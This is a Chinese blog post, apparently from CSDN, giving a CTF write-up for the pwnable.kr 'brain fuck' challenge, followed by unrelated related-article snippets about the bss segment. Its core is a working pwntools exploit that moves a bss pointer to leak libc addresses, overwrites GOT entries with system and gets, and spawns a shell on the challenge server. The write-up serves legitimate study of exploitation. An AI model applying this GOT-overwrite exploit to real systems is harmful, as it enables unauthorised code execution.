pwnable brain fuck(bss段的用途)

最新推荐文章于 2023-09-14 23:55:24 发布
最新推荐文章于 2023-09-14 23:55:24 发布
阅读量645 收藏 1
点赞数
分类专栏: 溢出攻击
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38204481/article/details/82858674
版权

题目链接传送门
这里题目跟网鼎杯线下赛的一个pwn有些相似。
输入一些字符可以控制一个指针,可以向这个指针指向的地址处写数据。
在这里插入图片描述
首先要知道bss段里面有什么。
在这道题里面的p指针的更高地址处是stdin,stdout,stderr然后是函数的got表,这里可以控制指针p泄露和修改got表。

#coding=utf-8
from pwn import *

p=0x0804a0a0
putchar=0x804a030
jmp=0x8048671

debug=0
if debug: 
	p=process("bf")
	elf=ELF("bf")
	libc=ELF("bf_libc.so")
	context.log_level="debug"
else:
	p=remote("pwnable.kr",9001)
	elf=ELF("bf")
	libc=ELF("bf_libc.so")
	context.log_level="debug"




p.recvuntil("type some brainfuck instructions except [ ]\n")
payload="."
payload+="<"*(112-4)+"<."*4+"<"#leak putchar
payload+=">,"*4+"<"*36+">,"*4  #reset puts,fgets
payload+="<"*4+'>'*28+'>,'*4+'.' #reset  memset

p.sendline(payload)
p.recv(1)#这里是为了调用put函数向got表中写入真实地址

puts_addr=u32(p.recv(4)[::-1])
print "puts_addr="+hex(puts_addr)


system_addr=libc.symbols["system"]+puts_addr-libc.symbols["putchar"]
p.send(p32(jmp))
print "system_addr="+hex(system_addr)
print hex(elf.got["putchar"])
gets_addr=libc.symbols["gets"]+puts_addr-libc.symbols["putchar"]
print "gets_addr="+hex(gets_addr)
p.send(p32(system_addr))
p.send(p32(gets_addr))


p.recvuntil("type some brainfuck instructions except [ ]\n")
p.sendline("/bin/sh\x00")

p.interactive()

需要注意的是这里的result = putchar(*(char *)p);函数好像直接复写它的got表就行了,但实际上这里的p
是一个字符,并不是一个指针

.text:0804863A                 mov     eax, ds:p       ; jumptable 080485FC case 46
.text:0804863F                 movzx   eax, byte ptr [eax]
.text:08048642                 movsx   eax, al
.text:08048645                 mov     [esp], eax      ; c
.text:08048648                 call    _putchar

所以让程序回到开始出再运行一遍获取到shell。

九层台
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
bss.zip
11-03
标题中的“bss.zip”可能是指一个包含了与“bss”相关的资料的压缩文件。在IT领域中,“bss”通常代表“Basic Service Set”,这是Wi-Fi网络的一个组成部分,指的是无线设备可以相互通信的范围。然而,由于提供的...
BSS123LT1的技术参数
12-11
产品型号:BSS123LT1源漏极间雪崩电压VBR(V):100源漏极最大导通电阻rDS(on)(mΩ):6000最大漏极电流Id(on)(A):0.170通道极性:N沟道封装/温度(℃):SOT-23/-55~150描述:小信号N沟道SOT23封装场效应管价格/1片(套):¥.60...
pwnable 笔记 Rookiss - brain fuck - 150 pt
HiTaQini
12-15 3072
终于打到第二关了... 这题考察GOT覆写
.bss和.data
热门推荐
qq_34888036的博客
06-30 4万+
BSSBSSbss segment)通常是指用来存放程序中未初始化的或者初始值为0的全局变量的一块内存区域。BSS是英文Block Started by Symbol的简称。BSS属于静态内存分配。 数据:数据(data segment)通常是指用来存放程序中已初始化的全局变量的一块内存区域。数据属于静态内存分配。 代码:代码(code segment/text seg...
BSS
longtype的博客
02-23 1万+
(深入理解计算机系统) bss,data、text、堆(heap)和栈(stack) 1 关于BSS的大小 2 1. BSS中的内容 2 2.BSS在加载运行前的处理 3 3.BSS的作用 3 4. 代码优化对BSS的影响 3 5.Linux 下查看属性的指令: 4 BSS大小实验 4 清除BSS的一般做法 6 link脚本一般包含类似语句: 6   (深...
计算机系统中的.bss:深入解析与细节剖析
最新发布
m0_72410588的博客
09-14 1542
在计算机的内存分结构中,每个程序都会被分为不同的,包括代码、数据和.bss。其中,.bss是一种特殊的数据,用于存储未初始化的全局变量和静态变量。在计算机系统中,.bss是一种用于存储未初始化全局变量和静态变量的特殊数据。它在程序加载到内存时会被清零,并在使用前不需要显式地初始化。.bss的大小取决于程序中未初始化变量的总大小,它的位置紧跟在数据之后。了解和理解.bss的特点和细节,对于编写高效、可靠的程序具有重要的意义。
text、databss知识介绍
Cheatscat的博客
08-26 4955
一、总体概述 1、bss(可读可写) bss是英文Block Started by Symbol的简称,通常是指用来存放程序中未初始化的全局变量的一块内存区域,在程序载入时由内核清0。BSS属于静态内存分配。它的初始值也是由用户自己定义的连接定位文件所确定,用户应该将它定义在可读写的RAM区内,源程序中使用malloc分配的内存就是这一块,它不是根据data大小确定,主要由程序中同时分配内存最大值所确定,不过如果超出了范围,也就是分配失败,可以等空间释放之后再分配。 2、text(只读) ...
BSS.rar_bss
09-20
标题"BSS.rar_bss"指的是一个与盲源分离(Blind Source Separation, BSS)相关的MATLAB程序压缩包。盲源分离是一种信号处理技术,主要用于在不知道原始信号特性和混合方式的情况下,从多个传感器接收到的混合信号中...
BSS84LT1的技术参数
12-11
产品型号:BSS84LT1源漏极间雪崩电压VBR(V):50源漏极最大导通电阻rDS(on)(mΩ):10000最大漏极电流Id(on)(A):0.130通道极性:P沟道封装/温度(℃):SOT-23/-55~150描述:小信号P沟道SOT23封装场效应管价格/1片(套):¥.70 
BSS138LT1G的技术参数
12-11
产品型号:BSS138LT1G源漏极间雪崩电压VBR(V):50源漏极最大导通电阻rDS(on)(mΩ):3500最大漏极电流Id(on)(A):0.200通道极性:N沟道封装/温度(℃):SOT-23/-55~150描述:小信号N沟道SOT23封装场效应管价格/1片(套):¥.60...
bss
一个人的旅行的博客
03-21 1554
1. 理论BSS(Block Started by Symbol)用来存储未初始化的全局变量和静态变量,全局变量或静态变量值为0或NULL(对于指针变量而言)的通常会被编译器认为未初始化,属于静态内存分配区,不会占用程序文件空间,不存储这些变量在外存上,但是还是会占用一部分空间,这些空间用来标识未初始化的变量大小、属性等信息.DATA用来存储已经初始化的全局变量,也属于静态内存分配区,会占用程序文...
pwn 栈题基础
y0un9er
08-18 925
简要得介绍了一下栈题的思路
津门杯2021CTF pwn
qq_39948058的博客
08-26 473
前言:这个题一开始调通了,但是不知道正确的libc版本,远程没有打通,最后听了一下libc版本是11.4的libc2.23版本,才打通,题很多洞,比较经典的是edit的READ容易写。写到freehook为onegadget即可,tcl,只解了一道题,时间原因第二道pwn题也没看,噗。。 漏洞点: 漏洞点这两个地方,他们都是在bss里,而且位置比较临近可以直接考虑一下任意写,当时没太注意这个点,直接doublefree的,发现只给了4个chunk,所以没能构建出,又审计了一下edit R.
一文读懂 .bss 的作用
吉祥如意的博客
03-19 7912
网上诸多博主关于.bss的解释,看了一圈下来,神乎其神,完全脱离实际,只会用“古文”来喝退小白。然而,问题并未解决···因此,想综合自己的理解,用白话文将 .bss 的作用给大家讲明白 文章目录1. 位置2. 作用1)概念2)好处3. 实现1)解释2)举例 1. 位置 在程序执行前,这块区域的大小就已经固定。值得注意的是,这块区域可以读写。 2. 作用 1)概念 BSS通常是指用来存放程序中未初始化的或者初始化为0的全局变量和静态变量 也就是说,只要初始值为0的类型,都会先放在这里,等到再次赋值
c语言堆、栈、数据、代码bss的疑惑
qq_41882586的博客
03-02 2226
程序的内存分配 一个由c/C++编译的程序占用的内存分为以下几个部分 1、栈区(stack)— 由编译器自动分配释放 ,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中的栈。 2、堆区(heap) — 一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式倒是类似于链表。 3、全局区(静态区)(static)—,全局变量和静态变量的存储是放在一块的,初始化的全局变量和静态变量在一块区域, 未初始化的全局变量和未初始化的静态变量在相邻的另一块区
linux程序分机制
01-20 612
终于知道什么叫BSS 是“Block Started by Symbol”的缩写,意为“以符号开始的块”。   BSS是Unix链接器产生的未初始化数据。其他的分别是包含程序代码的 “text”和包含已初始化数据的“data”BSS的变量只有名称和大小却没有值。此名后来被许多文件格式使用,包括PE。“以符号开始的块” 指的是编译器处理未初始化数据的地方。BSS节不包含任何
关于BSS和Data
人人都懂物联网
01-18 3393
BSS(Block Started by Symbol)这个词最初是UA-SAP汇编器(United Aircraft Symbolic AssemblyProgram)中的一个伪指令,用于为符号预留一块内存空间。该汇编器由美国联合航空公司于20世纪50年代中期为IBM 704大型机所开发。后来BSS这个词被作为关键字引入到了IBM 709和7090/94机型上的标准汇编器FA
pwnable.kr - brain fuck
加号减减号的博客
03-06 820
题目简介 分析 writeup 题目简介 Brain fuckpwnable.kr 第二阶的第一道题,考察了覆些 GOT 表等知识点。题目信息如下: 分析 将下载得到的 bf 文件拖进 IDA 中查看,发现程序主要由 main 函数以及 do_brainfuck 函数组成,且没有开启 PIE。 main 函数如下: int __cdecl main...
pwnable.kr brainfuck writeup
jmp esp
03-28 1753
题目I made a simple brain-fuck language emulation program written in C. The [ ] commands are not implemented yet. However the rest functionality seems working fine. Find a bug and exploit it to get a
bss、数据、代码
07-14
在计算机执行程序时,内存通常被分为不同的,以便于存储和访问不同类型的数据和指令。常见的三种内存bss、数据和代码。 1. bssbss代表Block Started by Symbol,通常用于存储未初始化的全局变量和静态变量,它们在程序启动时会自动被赋值为0或空指针。这个通常位于数据的后面,它的大小在编译时就已经确定了。 2. 数据:数据用来存储已经初始化的全局变量和静态变量,它的内容在程序执行过程中是不会改变的。数据的大小也在编译时就已经确定了。 3. 代码:代码用于存储程序的指令,也就是代码。程序执行时,CPU会按照代码中的指令来逐条执行程序。代码通常位于数据的后面,它的大小在编译时也已经确定了。 这些内存的划分使得程序的内存布局更加清晰,同时也方便了程序的调试和优化。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值